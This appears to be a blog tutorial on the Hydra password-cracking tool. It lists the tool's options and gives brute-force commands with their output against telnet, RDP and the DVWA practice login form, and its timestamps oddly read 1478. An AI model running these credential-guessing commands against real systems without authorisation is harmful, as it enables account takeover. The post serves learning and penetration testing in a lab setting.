control – hydra passwords

Hydra (http://www.thc.org/thc-hydra) starting at 1478-09-28 13:36:23
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type “-x -h” to get help
-e nsr try “n” null password, “s” login as pass and/or “r” reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated “login:pass” format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V verbose mode / show login+pass combination for each attempt
-U service module usage details

————————————————————————–

to use the gui version if required
root@bt:~# xhydra

Below is command line examples

Hydra is great for brute-forcing remote services like rdp, telnet and ssh

Testing with Telnet Backtrack 5R1

root@bt:~# hydra -l admin -p password -t 2 Remote-IP-Address telnet

Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 1478-07-28 11:36:27
[WARNING] telnet is by its nature unreliable to analyze reliable, if possible better choose FTP or SSH if available

[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service telnet on port 23

[23][telnet] host: (Remote-IP-Address) login: admin password: password

[STATUS] attack finished for (Remote-IP-Address) (waiting for children to finish)

1 of 1 target successfuly completed, 1 valid password found

Hydra (http://www.thc.org/thc-hydra) finished at 1478-07-28 11:36:28

————————————————————————–

Testing with RDP

root@bt:~# hydra -l admin -p password -t 2 Remote-IP-Address rdp
Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 1478-07-28 11:36:29
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service rdp on port 3389

[3389][rdp] host: (Remote-IP-Address) login: admin password: password

[STATUS] attack finished for (Remote-IP-Address) (waiting for children to finish)

1 of 1 target successfuly completed, 1 valid password found

Hydra (http://www.thc.org/thc-hydra) finished at 1478-07-28 11:36:30

————————————————————————–

Testing hydra with dvwa – Note not a fan of using hydra and medusa with web appliactions becuase the chance of success is very low and it’s very complex to get right.

root@bt:~# hydra Remote-IP-Address http-get-form “/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=fe4d577c1704ed9d87f3cbe3e4c8d4de” -l admin -P /root/passwords/Passwords -V

Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 1478-07-28 11:36:32
[DATA] 15 tasks, 1 server, 15 login tries (l:1/p:15), ~1 try per task
[DATA] attacking service http-get-form on port 80

[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “monkey” – 1 of 15 [child 0]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “happy” – 2 of 15 [child 1]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “123456789” – 3 of 15 [child 2]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “pass” – 4 of 15 [child 3]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “games” – 5 of 15 [child 4]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “hack” – 6 of 15 [child 5]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “admin” – 7 of 15 [child 6]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “password” – 8 of 15 [child 7]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “monkeyddd” – 9 of 15 [child 8]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “happydd” – 10 of 15 [child 9]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “123456789dd” – 11 of 15 [child 10]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “passddd” – 12 of 15 [child 11]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “gamesdd” – 13 of 15 [child 12]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “hackdd” – 14 of 15 [child 13]
[ATTEMPT] target (Remote-IP-Address) – login “admin” – pass “admindd” – 15 of 15 [child 14]

[80][www-form] host: (Remote-IP-Address) login: admin password: password

[STATUS] attack finished for (Remote-IP-Address)(waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 1478-07-28 11:36:35

Advertisements

2 thoughts on “control – hydra passwords

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s